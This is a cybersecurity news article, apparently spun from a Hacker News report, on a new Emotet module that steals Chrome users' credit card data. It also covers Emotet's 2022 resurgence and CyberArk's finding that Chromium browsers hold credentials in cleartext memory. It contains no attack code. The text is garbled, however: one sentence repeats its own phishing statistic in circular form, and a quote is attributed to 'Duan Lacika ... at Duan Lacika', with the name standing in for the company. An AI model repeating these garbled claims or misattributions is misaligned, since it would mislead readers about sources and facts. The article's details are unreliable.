Google Chrome users’ credit card information is being stolen by a new Emotet variant. The notorious Emotet malware has been updated to include a new module that steals credit card information from the Chrome web browser.

According to corporate security company Proofpoint, which discovered the credit card stealer on June 6, the component has the capacity to exfiltrate the acquired information to several remote command-and-control (C2) servers.

The news comes amid a surge in Emotet activity since it was restored late last year after a 10-month hiatus caused by a law enforcement operation that shut down the company’s attack infrastructure in January 2021.

Emotet is a complex, self-propagating, and modular trojan that’s transmitted via email campaigns and used as a distributor for other payloads like ransomware. It’s credited to a threat actor known as TA542 (aka Mummy Spider or Gold Crestwood).

According to Check Point, Emotet is still the most popular malware, affecting 6% of organizations globally, followed by Formbook and Agent Tesla, with the malware experimenting with new delivery methods such as OneDrive URLs and PowerShell in.LNK attachments to circumvent Microsoft’s macro restrictions.

The fact that the number of phishing emails, which often hijack existing correspondence, increased from 3,000 in February 2022 to approximately 30,000 in March, indicating a steady increase in Emotet-related threats, is further evidenced by the fact that phishing emails targeting organizations in various countries increased from 3,000 in February 2022 to approximately 30,000 in March as part of a mass-scale spam campaign.

ESET stated that Emotet activity “moved to a higher gear” in March and April 2022, claiming that detections increased 100-fold in the first four months of the year, compared to the previous three-month period from September to December 2021.

Japan, Italy, and Mexico have been regular targets since the botnet’s revival, according to the Slovak cybersecurity firm, with the largest wave occurring on March 16, 2022.

“The current Emotet LNK and XLL campaigns were substantially smaller than those disseminated via hacked DOC files seen in March,” stated Duan Lacika, a senior detection engineer at Duan Lacika.

“This shows that the botnet’s controllers are only utilizing a small portion of the botnet’s capacity while experimenting with new distribution routes that could replace the VBA macros, which are currently disabled by default.”

Researchers from CyberArk also revealed a new way for extracting plaintext credentials directly from memory in Chromium-based web browsers as part of their findings.

“Credential data is kept in cleartext format in Chrome’s RAM,” stated CyberArk’s Zeev Ben Porat. “An attacker can induce the browser to load all the passwords stored in the password manager into memory, in addition to data that is dynamically entered when signing into certain web apps.”

This includes cookie-related information like session cookies, which could allow an attacker to extract the data and use it to compromise users’ accounts even if they are protected by multi-factor authentication.

Have you enjoyed reading this article? To read more exclusive material from THN, follow us on Facebook. Google Chrome users’ credit card information is being stolen by a new Emotet variant.


Leave A Reply